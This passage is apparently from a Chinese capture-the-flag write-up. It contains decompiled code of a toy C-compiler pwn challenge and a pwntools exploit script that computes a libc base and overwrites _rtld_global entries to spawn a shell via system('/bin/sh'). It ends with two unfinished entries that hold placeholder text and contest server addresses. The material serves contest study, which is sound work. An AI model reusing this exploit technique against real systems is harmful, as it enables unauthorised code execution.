if ( qword_206078 )
v2 = 9LL;
else
v2 = 10LL;
*(_QWORD *)qword_206088 = v2;
}
break;
case 40LL:
sub_B70();
if ( qword_206070 != 138 && qword_206070 != 134 )
{
sub_16CB(142LL);
if ( qword_206070 != 41 )
{
printf("%d: close paren expected\n", qword_206098);
exit(-1);
}
sub_B70();
}
else
{
v19 = qword_206070 == 138;
sub_B70();
while ( qword_206070 == 159 )
{
sub_B70();
v19 += 2LL;
}
if ( qword_206070 != 41 )
{
printf("%d: bad cast\n", qword_206098);
exit(-1);
}
sub_B70();
sub_16CB(162LL);
qword_206078 = v19;
}
break;
case 159LL:
sub_B70();
sub_16CB(162LL);
if ( qword_206078 <= 1 )
{
printf("%d: bad dereference\n", qword_206098);
exit(-1);
}
qword_206078 -= 2LL;
qword_206088 = (char *)qword_206088 + 8;
if ( qword_206078 )
v3 = 9LL;
else
v3 = 10LL;
*(_QWORD *)qword_206088 = v3;
break;
case 148LL:
sub_B70();
sub_16CB(162LL);
if ( *(_QWORD *)qword_206088 != 10LL && *(_QWORD *)qword_206088 != 9LL )
{
printf("%d: bad address-of\n", qword_206098);
exit(-1);
}
qword_206088 = (char *)qword_206088 - 8;
qword_206078 += 2LL;
break;
case 33LL:
sub_B70();
sub_16CB(162LL);
qword_206088 = (char *)qword_206088 + 8;
*(_QWORD *)qword_206088 = 13LL;
qword_206088 = (char *)qword_206088 + 8;
*(_QWORD *)qword_206088 = 1LL;
qword_206088 = (char *)qword_206088 + 8;
*(_QWORD *)qword_206088 = 0LL;
qword_206088 = (char *)qword_206088 + 8;
*(_QWORD *)qword_206088 = 17LL;
qword_206078 = 1LL;
break;
case 126LL:
sub_B70();
sub_16CB(162LL);
qword_206088 = (char *)qword_206088 + 8;
*(_QWORD *)qword_206088 = 13LL;
qword_206088 = (char *)qword_206088 + 8;
*(_QWORD *)qword_206088 = 1LL;
qword_206088 = (char *)qword_206088 + 8;
*(_QWORD *)qword_206088 = -1LL;
qword_206088 = (char *)qword_206088 + 8;
*(_QWORD *)qword_206088 = 15LL;
qword_206078 = 1LL;
break;
case 157LL:
sub_B70();
sub_16CB(162LL);
qword_206078 = 1LL;
break;
case 158LL:
sub_B70();
qword_206088 = (char *)qword_206088 + 8;
*(_QWORD *)qword_206088 = 1LL;
if ( qword_206070 == 128 )
{
qword_206088 = (char *)qword_206088 + 8;
*(_QWORD *)qword_206088 = -qword_2060A8;
sub_B70();
}
else
{
qword_206088 = (char *)qword_206088 + 8;
*(_QWORD *)qword_206088 = -1LL;
qword_206088 = (char *)qword_206088 + 8;
*(_QWORD *)qword_206088 = 13LL;
sub_16CB(162LL);
qword_206088 = (char *)qword_206088 + 8;
*(_QWORD *)qword_206088 = 27LL;
}
qword_206078 = 1LL;
break;
default:
if ( qword_206070 != 162 && qword_206070 != 163 )
{
printf("%d: bad expression\n", qword_206098);
exit(-1);
}
v20 = qword_206070;
sub_B70();
sub_16CB(162LL);
if ( *(_QWORD *)qword_206088 == 10LL )
{
*(_QWORD *)qword_206088 = 13LL;
qword_206088 = (char *)qword_206088 + 8;
*(_QWORD *)qword_206088 = 10LL;
}
else
{
if ( *(_QWORD *)qword_206088 != 9LL )
{
printf("%d: bad lvalue in pre-increment\n", qword_206098);
exit(-1);
}
*(_QWORD *)qword_206088 = 13LL;
qword_206088 = (char *)qword_206088 + 8;
*(_QWORD *)qword_206088 = 9LL;
}
qword_206088 = (char *)qword_206088 + 8;
*(_QWORD *)qword_206088 = 13LL;
qword_206088 = (char *)qword_206088 + 8;
*(_QWORD *)qword_206088 = 1LL;
qword_206088 = (char *)qword_206088 + 8;
if ( qword_206078 <= 2 )
v4 = 1LL;
else
v4 = 8LL;
*(_QWORD *)qword_206088 = v4;
qword_206088 = (char *)qword_206088 + 8;
if ( v20 == 162 )
v5 = 25LL;
else
v5 = 26LL;
*(_QWORD *)qword_206088 = v5;
qword_206088 = (char *)qword_206088 + 8;
if ( qword_206078 )
v6 = 11LL;
else
v6 = 12LL;
*(_QWORD *)qword_206088 = v6;
break;
}
while ( qword_206070 >= a1 )
{
v21 = qword_206078;
switch ( qword_206070 )
{
case 142LL:
sub_B70();
if ( *(_QWORD *)qword_206088 != 10LL && *(_QWORD *)qword_206088 != 9LL )
{
printf("%d: bad lvalue in assignment\n", qword_206098);
exit(-1);
}
*(_QWORD *)qword_206088 = 13LL;
sub_16CB(142LL);
qword_206088 = (char *)qword_206088 + 8;
qword_206078 = v21;
if ( v21 )
v7 = 11LL;
else
v7 = 12LL;
*(_QWORD *)qword_206088 = v7;
break;
case 143LL:
sub_B70();
qword_206088 = (char *)qword_206088 + 8;
*(_QWORD *)qword_206088 = 4LL;
qword_206088 = (char *)qword_206088 + 8;
v23 = qword_206088;
sub_16CB(142LL);
if ( qword_206070 != 58 )
{
printf("%d: conditional missing colon\n", qword_206098);
exit(-1);
}
sub_B70();
*v23 = (char *)qword_206088 + 24;
qword_206088 = (char *)qword_206088 + 8;
*(_QWORD *)qword_206088 = 2LL;
qword_206088 = (char *)qword_206088 + 8;
v8 = qword_206088;
sub_16CB(143LL);
*v8 = (char *)qword_206088 + 8;
break;
case 144LL:
sub_B70();
qword_206088 = (char *)qword_206088 + 8;
*(_QWORD *)qword_206088 = 5LL;
qword_206088 = (char *)qword_206088 + 8;
v9 = qword_206088;
sub_16CB(145LL);
*v9 = (char *)qword_206088 + 8;
qword_206078 = 1LL;
break;
case 145LL:
sub_B70();
qword_206088 = (char *)qword_206088 + 8;
*(_QWORD *)qword_206088 = 4LL;
qword_206088 = (char *)qword_206088 + 8;
v10 = qword_206088;
sub_16CB(146LL);
*v10 = (char *)qword_206088 + 8;
qword_206078 = 1LL;
break;
case 146LL:
sub_B70();
qword_206088 = (char *)qword_206088 + 8;
*(_QWORD *)qword_206088 = 13LL;
sub_16CB(147LL);
qword_206088 = (char *)qword_206088 + 8;
*(_QWORD *)qword_206088 = 14LL;
qword_206078 = 1LL;
break;
case 147LL:
sub_B70();
qword_206088 = (char *)qword_206088 + 8;
*(_QWORD *)qword_206088 = 13LL;
sub_16CB(148LL);
qword_206088 = (char *)qword_206088 + 8;
*(_QWORD *)qword_206088 = 15LL;
qword_206078 = 1LL;
break;
case 148LL:
sub_B70();
qword_206088 = (char *)qword_206088 + 8;
*(_QWORD *)qword_206088 = 13LL;
sub_16CB(149LL);
qword_206088 = (char *)qword_206088 + 8;
*(_QWORD *)qword_206088 = 16LL;
qword_206078 = 1LL;
break;
case 149LL:
sub_B70();
qword_206088 = (char *)qword_206088 + 8;
*(_QWORD *)qword_206088 = 13LL;
sub_16CB(151LL);
qword_206088 = (char *)qword_206088 + 8;
*(_QWORD *)qword_206088 = 17LL;
qword_206078 = 1LL;
break;
case 150LL:
sub_B70();
qword_206088 = (char *)qword_206088 + 8;
*(_QWORD *)qword_206088 = 13LL;
sub_16CB(151LL);
qword_206088 = (char *)qword_206088 + 8;
*(_QWORD *)qword_206088 = 18LL;
qword_206078 = 1LL;
break;
case 151LL:
sub_B70();
qword_206088 = (char *)qword_206088 + 8;
*(_QWORD *)qword_206088 = 13LL;
sub_16CB(155LL);
qword_206088 = (char *)qword_206088 + 8;
*(_QWORD *)qword_206088 = 19LL;
qword_206078 = 1LL;
break;
case 152LL:
sub_B70();
qword_206088 = (char *)qword_206088 + 8;
*(_QWORD *)qword_206088 = 13LL;
sub_16CB(155LL);
qword_206088 = (char *)qword_206088 + 8;
*(_QWORD *)qword_206088 = 20LL;
qword_206078 = 1LL;
break;
case 153LL:
sub_B70();
qword_206088 = (char *)qword_206088 + 8;
*(_QWORD *)qword_206088 = 13LL;
sub_16CB(155LL);
qword_206088 = (char *)qword_206088 + 8;
*(_QWORD *)qword_206088 = 21LL;
qword_206078 = 1LL;
break;
case 154LL:
sub_B70();
qword_206088 = (char *)qword_206088 + 8;
*(_QWORD *)qword_206088 = 13LL;
sub_16CB(155LL);
qword_206088 = (char *)qword_206088 + 8;
*(_QWORD *)qword_206088 = 22LL;
qword_206078 = 1LL;
break;
case 155LL:
sub_B70();
qword_206088 = (char *)qword_206088 + 8;
*(_QWORD *)qword_206088 = 13LL;
sub_16CB(157LL);
qword_206088 = (char *)qword_206088 + 8;
*(_QWORD *)qword_206088 = 23LL;
qword_206078 = 1LL;
break;
case 156LL:
sub_B70();
qword_206088 = (char *)qword_206088 + 8;
*(_QWORD *)qword_206088 = 13LL;
sub_16CB(157LL);
qword_206088 = (char *)qword_206088 + 8;
*(_QWORD *)qword_206088 = 24LL;
qword_206078 = 1LL;
break;
case 157LL:
sub_B70();
qword_206088 = (char *)qword_206088 + 8;
*(_QWORD *)qword_206088 = 13LL;
sub_16CB(159LL);
qword_206078 = v21;
if ( v21 > 2 )
{
qword_206088 = (char *)qword_206088 + 8;
*(_QWORD *)qword_206088 = 13LL;
qword_206088 = (char *)qword_206088 + 8;
*(_QWORD *)qword_206088 = 1LL;
qword_206088 = (char *)qword_206088 + 8;
*(_QWORD *)qword_206088 = 8LL;
qword_206088 = (char *)qword_206088 + 8;
*(_QWORD *)qword_206088 = 27LL;
}
qword_206088 = (char *)qword_206088 + 8;
*(_QWORD *)qword_206088 = 25LL;
break;
case 158LL:
sub_B70();
qword_206088 = (char *)qword_206088 + 8;
*(_QWORD *)qword_206088 = 13LL;
sub_16CB(159LL);
if ( v21 <= 2 || v21 != qword_206078 )
{
qword_206078 = v21;
if ( v21 > 2 )
{
qword_206088 = (char *)qword_206088 + 8;
*(_QWORD *)qword_206088 = 13LL;
qword_206088 = (char *)qword_206088 + 8;
*(_QWORD *)qword_206088 = 1LL;
qword_206088 = (char *)qword_206088 + 8;
*(_QWORD *)qword_206088 = 8LL;
qword_206088 = (char *)qword_206088 + 8;
*(_QWORD *)qword_206088 = 27LL;
}
qword_206088 = (char *)qword_206088 + 8;
*(_QWORD *)qword_206088 = 26LL;
}
else
{
qword_206088 = (char *)qword_206088 + 8;
*(_QWORD *)qword_206088 = 26LL;
qword_206088 = (char *)qword_206088 + 8;
*(_QWORD *)qword_206088 = 13LL;
qword_206088 = (char *)qword_206088 + 8;
*(_QWORD *)qword_206088 = 1LL;
qword_206088 = (char *)qword_206088 + 8;
*(_QWORD *)qword_206088 = 8LL;
qword_206088 = (char *)qword_206088 + 8;
*(_QWORD *)qword_206088 = 28LL;
qword_206078 = 1LL;
}
break;
case 159LL:
sub_B70();
qword_206088 = (char *)qword_206088 + 8;
*(_QWORD *)qword_206088 = 13LL;
sub_16CB(162LL);
qword_206088 = (char *)qword_206088 + 8;
*(_QWORD *)qword_206088 = 27LL;
qword_206078 = 1LL;
break;
case 160LL:
sub_B70();
qword_206088 = (char *)qword_206088 + 8;
*(_QWORD *)qword_206088 = 13LL;
sub_16CB(162LL);
qword_206088 = (char *)qword_206088 + 8;
*(_QWORD *)qword_206088 = 28LL;
qword_206078 = 1LL;
break;
case 161LL:
sub_B70();
qword_206088 = (char *)qword_206088 + 8;
*(_QWORD *)qword_206088 = 13LL;
sub_16CB(162LL);
qword_206088 = (char *)qword_206088 + 8;
*(_QWORD *)qword_206088 = 29LL;
qword_206078 = 1LL;
break;
default:
if ( qword_206070 != 162 && qword_206070 != 163 )
{
if ( qword_206070 != 164 )
{
printf("%d: compiler error tk=%d\n", qword_206098, qword_206070);
exit(-1);
}
sub_B70();
qword_206088 = (char *)qword_206088 + 8;
*(_QWORD *)qword_206088 = 13LL;
sub_16CB(142LL);
if ( qword_206070 != 93 )
{
printf("%d: close bracket expected\n", qword_206098);
exit(-1);
}
sub_B70();
if ( v21 <= 2 )
{
if ( v21 <= 1 )
{
printf("%d: pointer type expected\n", qword_206098);
exit(-1);
}
}
else
{
qword_206088 = (char *)qword_206088 + 8;
*(_QWORD *)qword_206088 = 13LL;
qword_206088 = (char *)qword_206088 + 8;
*(_QWORD *)qword_206088 = 1LL;
qword_206088 = (char *)qword_206088 + 8;
*(_QWORD *)qword_206088 = 8LL;
qword_206088 = (char *)qword_206088 + 8;
*(_QWORD *)qword_206088 = 27LL;
}
qword_206088 = (char *)qword_206088 + 8;
*(_QWORD *)qword_206088 = 25LL;
qword_206088 = (char *)qword_206088 + 8;
qword_206078 = v21 - 2;
if ( v21 == 2 )
v16 = 10LL;
else
v16 = 9LL;
*(_QWORD *)qword_206088 = v16;
}
else
{
if ( *(_QWORD *)qword_206088 == 10LL )
{
*(_QWORD *)qword_206088 = 13LL;
qword_206088 = (char *)qword_206088 + 8;
*(_QWORD *)qword_206088 = 10LL;
}
else
{
if ( *(_QWORD *)qword_206088 != 9LL )
{
printf("%d: bad lvalue in post-increment\n", qword_206098);
exit(-1);
}
*(_QWORD *)qword_206088 = 13LL;
qword_206088 = (char *)qword_206088 + 8;
*(_QWORD *)qword_206088 = 9LL;
}
qword_206088 = (char *)qword_206088 + 8;
*(_QWORD *)qword_206088 = 13LL;
qword_206088 = (char *)qword_206088 + 8;
*(_QWORD *)qword_206088 = 1LL;
qword_206088 = (char *)qword_206088 + 8;
if ( qword_206078 <= 2 )
v11 = 1LL;
else
v11 = 8LL;
*(_QWORD *)qword_206088 = v11;
qword_206088 = (char *)qword_206088 + 8;
if ( qword_206070 == 162 )
v12 = 25LL;
else
v12 = 26LL;
*(_QWORD *)qword_206088 = v12;
qword_206088 = (char *)qword_206088 + 8;
if ( qword_206078 )
v13 = 11LL;
else
v13 = 12LL;
*(_QWORD *)qword_206088 = v13;
qword_206088 = (char *)qword_206088 + 8;
*(_QWORD *)qword_206088 = 13LL;
qword_206088 = (char *)qword_206088 + 8;
*(_QWORD *)qword_206088 = 1LL;
qword_206088 = (char *)qword_206088 + 8;
if ( qword_206078 <= 2 )
v14 = 1LL;
else
v14 = 8LL;
*(_QWORD *)qword_206088 = v14;
qword_206088 = (char *)qword_206088 + 8;
if ( qword_206070 == 162 )
v15 = 26LL;
else
v15 = 25LL;
*(_QWORD *)qword_206088 = v15;
sub_B70();
}
break;
}
}
return __readfsqword(0x28u) ^ v24;
}
赛后了解到这是个 C 语言编译器,有一些限制,函数只能调用一次
函数和变量类型也只能用程序给的,程序主要利用点我这里是 gdb 调试出来的
通过 gdb 断点可以发现,我们定义的变量都在 ld 的可写段上
由于有不同 ld 对于 libc 偏移不一样,但同一 ld 对于 libc 偏移都一样的特性
我们可以得到带有 libc 地址的变量,之后程序会调用 exit 退出,但 exit 的参数是不定的
所以我就想靠 _rtld_global 来进行提权,因为 one_gadget 成功的机率太小,所以我用的是system("/bin/sh");
这题坑点就是在正常的 ld 上运行程序的话,指针和 libc 的偏移是 0x506XXX
但是远程环境对不上,是 0x529XXX 的偏移,以后做这类题可以考虑按页爆破了
这里还有一点是,假如我不在程序后面加上exit(0);,那么使用 one_gadget 提权的可能性就微乎其微
而加上后只有第四个 one_gadget(0xf1147) 能正常使用
exp 如下:
#!/usr/bin/env python
# -*- coding: utf-8 -*-
from pwn import *
debug = 1
context(arch='amd64', endian='el', os='linux')
context.log_level = 'debug'
if debug == 1:
p = process(['./chall'])
else:
p = remote('182.92.73.10', 24573)
libc = ELF('/lib/x86_64-linux-gnu/libc.so.6', checksec=False)
# gdb.attach(p, "b exit\nb *$rebase(0x44D6)" + "\nc")
# gdb.attach(p, "b _dl_fini\nc")
pd = '''
int *tmp;
int *libcbase;
int *addr_system;
int *addr_bin_sh;
int *addr__rtld_global_3848;
int *addr__rtld_global_2312;
void main(){
libcbase = (int)&tmp - 0x529010;
addr_system = (int)libcbase + 0x45390;
addr_bin_sh = (int)libcbase + 0x18cd57;
addr__rtld_global_3848 = (int)libcbase + 0x5f0040 + 3848;
addr__rtld_global_2312 = (int)libcbase + 0x5f0040 + 2312;
*addr__rtld_global_3848 = addr_system;
*addr__rtld_global_2312 = *addr_bin_sh;
}
'''
p.sendlineafter('ng...', pd)
p.interactive()
Flag:
动态靶机
boom2(未完)
文件存于:https://quqi.gblhgk.com/s/911627/2n6ziVZeKwCdZXRn
貌似也是一道 vmpwn
Description:
nc 182.92.73.10 36642
Solution:
程序保护如下:
Arch: amd64-64-little RELRO: Full RELRO Stack: Canary found NX: NX enabled PIE: PIE enabled
main 函数如下:
test
exp 如下:
test
Flag:
动态靶机
faster0(未完)
盲 Pwn,听说是 AEG,等官方开放题目吧
Description:
nc 39.96.72.181 42732
Solution:
盲 Pwn
程序保护如下:
test
main 函数如下:
test
exp 如下:
test
Flag:
动态靶机